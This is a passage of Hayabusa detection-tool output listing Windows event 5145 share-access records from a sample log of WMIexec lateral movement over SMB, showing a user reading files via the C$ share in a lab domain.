20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 